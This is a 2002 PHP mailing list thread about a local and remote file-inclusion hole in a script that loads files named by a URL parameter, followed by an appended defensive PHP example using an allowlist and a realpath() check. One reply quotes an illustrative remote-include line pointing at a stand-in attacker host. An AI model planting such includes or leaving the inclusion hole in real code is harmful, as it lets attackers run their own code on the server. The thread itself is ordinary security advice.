ah never thought of that!

John

On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
> The easiest and safest way to get around this problem is to place all your
> include files outside of your webroot directory (say one level up), so they
> will be accessible locally via includes, but NOT accessible via http.
>
> HTH, Stas
>
> ----- Original Message -----
> From: "John Wards" <[EMAIL PROTECTED]>
> To: "PHP" <[EMAIL PROTECTED]>
> Sent: Friday, October 04, 2002 10:58 AM
> Subject: Re: [PHP] Umm... Uh-oh
>
>
> erm......would that allow hackers access? Say I have a database include file
> would hackers be able to get access to my database like this?
>
> (include('http://mysite.com/datainc.php');)
>
> I hope bloody not!!! if so how on earth do I get round that!
>
> John
>
> On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> > Use realpath() to check the path. I also suspect your script is
> > vulnerable to cross-site includes
> > (include('http://hacker.com/script.inc');)
> >
> > Rick Beckman wrote:
> > >Okay, I was mistaken... There is a gaping security hole in my simple
> > > li'l script... How do I modify it to only accept files from a certain
> > > path? I want the url format to be script.php?call=1 where "1" is the
> > > called file in the /includes/ directory. Just when I get optimistic I
> > > leave the entire system exposed. Yeah, that fits with my luck. :-)


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
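
The realpath() check Marek suggests, combined with Stas's advice to keep includes outside the webroot, for the script.php?call=1 format Rick describes. This is an added example, not code from the thread: INCLUDE_DIR and resolve_include() are hypothetical names, and the directory layout and the .php extension on the included files are assumptions.

```php
<?php
// Added example. INCLUDE_DIR and resolve_include() are hypothetical names.
// Assumption: includes live one level above the webroot, so they cannot be
// requested directly over HTTP.
define('INCLUDE_DIR', realpath(__DIR__ . '/../includes'));

/**
 * Map the ?call= value to a file inside $baseDir, or return null.
 */
function resolve_include(string $call, string $baseDir): ?string
{
    // Allowlist the name: letters, digits, underscore, hyphen only.
    // This rejects "http://...", "../", null bytes and absolute paths up front.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $call)) {
        return null;
    }

    // realpath() resolves symlinks and ".." segments and returns false if
    // the file does not exist. Assumption: included files end in ".php".
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $call . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }

    // Containment check: the resolved path must still start with the base
    // directory plus a separator, so /includes_old does not match /includes.
    $prefix = rtrim($baseDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Only accept a plain string parameter (not ?call[]=...).
$call = isset($_GET['call']) && is_string($_GET['call']) ? $_GET['call'] : '';
$file = INCLUDE_DIR !== false ? resolve_include($call, INCLUDE_DIR) : null;

if ($file === null) {
    http_response_code(404);
    exit('Not found');
}
include $file;
```

Remote includes of the kind Marek mentions are additionally governed by the allow_url_include ini setting, which has defaulted to off since PHP 5.2.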
